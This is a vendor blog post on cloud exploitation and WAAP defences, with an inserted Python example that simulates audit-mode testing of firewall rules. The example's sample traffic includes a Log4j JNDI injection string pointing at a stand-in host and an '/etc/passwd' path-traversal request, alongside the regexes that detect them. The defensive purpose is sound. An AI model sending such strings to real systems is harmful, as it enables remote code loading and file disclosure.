Mitigating Cloud Exploitation Risks At The Edge

By Drazen Kerzan | October 18, 2023 | Updated: August 24, 2024 | 6 Mins Read

Following the global pandemic, enterprises have accelerated their transition to the cloud. The Infrastructure-as-a-Service (IaaS) cloud computing model facilitates remote work, speeds up digital transformation, offers scalability, boosts resilience, and can lead to cost savings. However, for businesses to effectively achieve this migration, they must understand the associated security implications and implement measures to protect their data and applications.

With the introduction of any new technology, it’s crucial that all the relevant security policies, tools, processes, and training are made clear to the organisation. A sensitive approach needs to be taken for cloud infrastructure due to the risks posed to customer-facing critical applications. The Shared Responsibility Model is a security and compliance framework that sets out the shared infrastructure and systems that a cloud provider is responsible for maintaining. It also explains how a customer is responsible for operating systems, data, and applications utilising the cloud. Companies migrating to the cloud must understand and follow these rules, otherwise data, applications, and cloud workloads may be exposed to security vulnerabilities.

Playbook for mitigating risks

Cloud exploitation involves targeting vulnerabilities in cloud infrastructure, applications, or services to gain unauthorised access, disrupt operations, steal data, or carry out other malicious activities. A cloud exploitation playbook could include attack vectors like distributed denial-of-service (DDoS) attacks, web application attacks, and bots – with the number one attack target being web applications. According to the 2023 Verizon Data Breach Investigations Report (DBIR), the majority of cyber attacks are led by organised criminals looking to disrupt business and steal data to sell. The number one reason (95%) for cyber attacks is financial gain, with 24% of all cyber attacks involving ransomware.

Results of cloud exploitation

  • Unauthorised Access: Attackers may attempt to gain unauthorised access to cloud accounts, systems, or data by exploiting weak or stolen credentials, misconfigurations, or vulnerabilities in the cloud environment. Once inside, they can potentially access sensitive information, modify data, or launch further attacks.
  • Data Breaches: Cloud exploitation can result in data breaches, where attackers gain access to sensitive data stored in the cloud. This can occur due to insecure configurations, inadequate access controls, or vulnerabilities in cloud storage or databases. The stolen data can be used for various malicious purposes, such as identity theft, financial fraud, or corporate espionage.
  • Distributed Denial of Service (DDoS): Attackers may launch DDoS attacks against cloud services or applications, overwhelming them with a high volume of malicious traffic or requests. This can lead to service disruptions, making the cloud resources unavailable for legitimate users.
  • Malware Distribution: Cloud exploitation can involve hosting or distributing malware through cloud-based platforms or services. Attackers may upload malicious files or applications to cloud storage or use cloud infrastructure to propagate malware to unsuspecting users.
  • Account Hijacking: Cloud exploitation can involve the compromise of user accounts, allowing attackers to gain control over cloud resources. This can occur through techniques like phishing, social engineering, or exploiting vulnerabilities in authentication mechanisms. Once an account is hijacked, attackers can abuse the cloud resources for their own purposes or launch attacks from within the compromised account.

Measures businesses can adopt to minimise cloud exploitation risks

Threat detection and mitigation speed are important for three key reasons. First, adversaries are adept at learning from open-source intelligence to develop new tactics, techniques, and procedures (TTPs), making rapid security response imperative. Second, cyber criminals are well-organised and act fast. Verizon’s 2023 DBIR noted, “more than 32% of all Log4j scanning activity over the course of the year happened within 30 days of its release (with the biggest spike of activity occurring within 17 days).” And, finally, the importance of speed is clearly illustrated by the fact that companies that contain a security breach in less than 30 days can save $1M or more.

To reduce the risk of cloud exploitation, it is crucial that businesses implement strong security measures, such as robust access controls, encryption, regular security assessments, and monitoring of cloud environments. Implementing Web Application and API Protection (WAAP) at the edge is critical to identifying and mitigating a variety of threats such as DDoS attacks, API abuse, and malicious bots. Modern-day WAAPs utilise machine learning and behavioural and signature fingerprinting for early threat detection. Further, companies using AI and automation see breaches that are 74 days shorter and save $3 million more than those without.

A WAAP rapid threat detection and mitigation solution is an invaluable tool for DevSecOps teams to implement an optimised “Observe-Orient-Decide-Act” (OODA) loop to improve mean time to detect (MTTD) and mean time to respond (MTTR) as new threats arise.

The latest innovation is a “Dual WAAP” capability that enables DevSecOps teams to test new rules in audit mode against production traffic to verify their effectiveness while lowering the risk of blocking legitimate site traffic. This increased confidence, plus the ability to integrate with existing CI/CD workflows, allows teams to push effective virtual patches out faster, closing the door on attackers more quickly than ever before. Additionally, with Dual WAAP, there is no WAAP downtime while updating rulesets, with new rules deployed across the global network sometimes in under 60 seconds.
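The audit-mode idea described above can be sketched as follows. This is an added example, not code from the article or from any vendor's product: the rule format, rule ids, and sample requests are hypothetical and constructed, and the "legit" label stands in for an analyst's review of logged traffic.

```python
import re

# Hypothetical rule format: (rule_id, request_field, compiled_regex).
PROD_RULES = [("prod-001", "path", re.compile(r"\.\./"))]
AUDIT_RULES = [
    ("audit-101", "query", re.compile(r"\$\{jndi:", re.I)),  # narrow candidate
    ("audit-102", "query", re.compile(r"\$")),               # overly broad candidate
]

# Constructed sample traffic; "legit" is an analyst-assigned label, not real data.
SAMPLE_REQUESTS = [
    {"path": "/search", "query": "q=blue+shoes", "legit": True},
    {"path": "/cart", "query": "price=$20&sku=881", "legit": True},
    {"path": "/search", "query": "q=${jndi:ldap://scanner.invalid/a}", "legit": False},
    {"path": "/../etc/passwd", "query": "", "legit": False},
    {"path": "/login", "query": "next=${JNDI:dns://scanner.invalid}", "legit": False},
]

def matches(rules, req):
    """Return the ids of the rules whose pattern matches the request."""
    return [rid for rid, field, rx in rules if rx.search(req.get(field, ""))]

def audit_report(requests, prod_rules, audit_rules):
    """Enforce production rules, only record audit rules, and tally audit hits."""
    report = {rid: {"true_pos": 0, "false_pos": 0} for rid, _, _ in audit_rules}
    blocked = 0
    for req in requests:
        if matches(prod_rules, req):
            blocked += 1  # the production verdict is the only one enforced
            continue
        # Audit verdicts are logged for requests production let through.
        for rid in matches(audit_rules, req):
            key = "false_pos" if req["legit"] else "true_pos"
            report[rid][key] += 1
    return blocked, report

def promotable(report):
    """Promote a candidate only if it caught something and hit no legitimate request."""
    return sorted(r for r, c in report.items()
                  if c["true_pos"] > 0 and c["false_pos"] == 0)

if __name__ == "__main__":
    blocked, report = audit_report(SAMPLE_REQUESTS, PROD_RULES, AUDIT_RULES)
    print("blocked by production:", blocked)
    print("audit tallies:", report)
    print("safe to promote:", promotable(report))
```

The broad candidate catches the same scanning requests as the narrow one but would also have blocked a legitimate cart request, which is the kind of false positive audit mode is meant to surface before a rule is enforced.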

What does the future hold for cloud infrastructure development?

There are many advantages that cloud Infrastructure-as-a-Service brings to organisations, including agility and resilience. However, cloud exploitation continues to increase and the Shared Responsibility Model emphasises the importance of maintaining enterprise security as partners. While it is the responsibility of cloud service providers to secure the cloud infrastructure, companies can’t let their guard down against the threat of attacks on operating systems, applications, endpoints, and data.

An indispensable tool for DevSecOps teams looking to enhance their “Observe-Orient-Decide-Act” (OODA) loop is a WAAP solution. It can rapidly detect and mitigate threats by reducing both the mean time to detect (MTTD) and the mean time to respond (MTTR). As organisations build up their defence in the fight against cyber threats, WAAP solutions are a strong and effective tool.

A WAAP solution is a critical tool for DevSecOps teams aiming to improve their “Observe-Orient-Decide-Act” (OODA) loop. It can quickly identify and mitigate threats, cutting down both the mean time to detect (MTTD) and the mean time to respond (MTTR). As organisations fortify their defences against cyber threats, WAAP solutions prove to be a robust and efficient tool.

Drazen Kerzan, Senior Manager, Solutions Engineering EMEA at Edgio

    The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.
